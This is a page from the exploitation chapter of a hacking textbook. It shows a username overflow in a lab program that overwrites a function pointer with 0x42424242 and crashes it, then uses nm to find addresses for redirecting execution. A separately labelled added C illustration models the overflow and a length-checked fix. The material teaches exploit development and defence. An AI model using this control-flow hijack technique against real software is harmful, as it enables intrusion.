Hacking - The Art of Exploitation, 2nd Edition

Exploitation 159

Enter your new name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.


-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] -> 1


[DEBUG] current_game pointer @ 0x42424242
Segmentation fault
reader@hacking:~/booksrc $


Select menu option 5 to change the username, and paste in the overflow buffer. This will overwrite the function pointer with 0x42424242. When menu option 1 is selected again, the program will crash when it tries to call the function pointer. This is proof that execution can be controlled; now all that’s needed is a valid address to insert in place of BBBB.
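The following is an added illustration, not code from the book: it models the crash above with a hypothetical struct player (the real game_of_chance layout is not shown on this page) whose name[] buffer sits directly in front of the current_game function pointer, measures how many bytes of input reach the pointer, and contrasts the unchecked copy that lets the BBBB land in it with a length-checked name change that rejects the oversized input.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical record standing in for the game's user struct (assumption:
 * the real game_of_chance layout is not shown on this page): a fixed-size
 * name buffer followed directly by the current_game function pointer. */
struct player {
    int credits;
    char name[100];
    int (*current_game)(void);
};
int pick_a_number(void) { return 1; }   /* stand-in game handler */

/* Bytes of input needed to reach the function pointer from name[0]. */
size_t bytes_to_pointer(void) {
    return offsetof(struct player, current_game) - offsetof(struct player, name);
}

/* Constructed input matching the page's: name[] full of 'A', then "BBBB". */
const char *overflow_input(void) {
    static char buf[sizeof(((struct player *)0)->name) + 5];
    memset(buf, 'A', sizeof buf - 5);
    memcpy(buf + sizeof buf - 5, "BBBB", 5);
    return buf;
}

/* Hardened name change: reject input that does not fit along with its NUL. */
int set_name_checked(struct player *p, const char *input) {
    size_t n = strlen(input);
    if (n >= sizeof p->name)
        return -1;
    memcpy(p->name, input, n + 1);
    return 0;
}

/* Applies one name change to a fresh record and returns the function pointer's
 * value afterwards.  The unchecked path copies the whole input into a byte
 * image of the record, as an unbounded strcpy into p->name would, while
 * keeping the demo inside defined behaviour. */
uintptr_t pointer_after(const char *input, int checked) {
    unsigned char raw[sizeof(struct player) + 16] = {0};  /* slack for the NUL */
    struct player p = {0};
    uintptr_t value;
    p.current_game = pick_a_number;
    if (checked)
        set_name_checked(&p, input);       /* returns -1 here; name untouched */
    memcpy(raw, &p, sizeof p);
    if (!checked)
        memcpy(raw + offsetof(struct player, name), input, strlen(input) + 1);
    memcpy(&value, raw + offsetof(struct player, current_game), sizeof value);
    return value;
}
```

The low 32 bits of the pointer after the unchecked copy read 0x42424242, the value in the page's debug line, while the checked path leaves the handler intact.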


The nm command lists symbols in object files. This can be used to find addresses of various functions in a program.


reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
         w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux
08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
         w __gmon_start__
08049669 T __i686.get_pc_thunk.bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
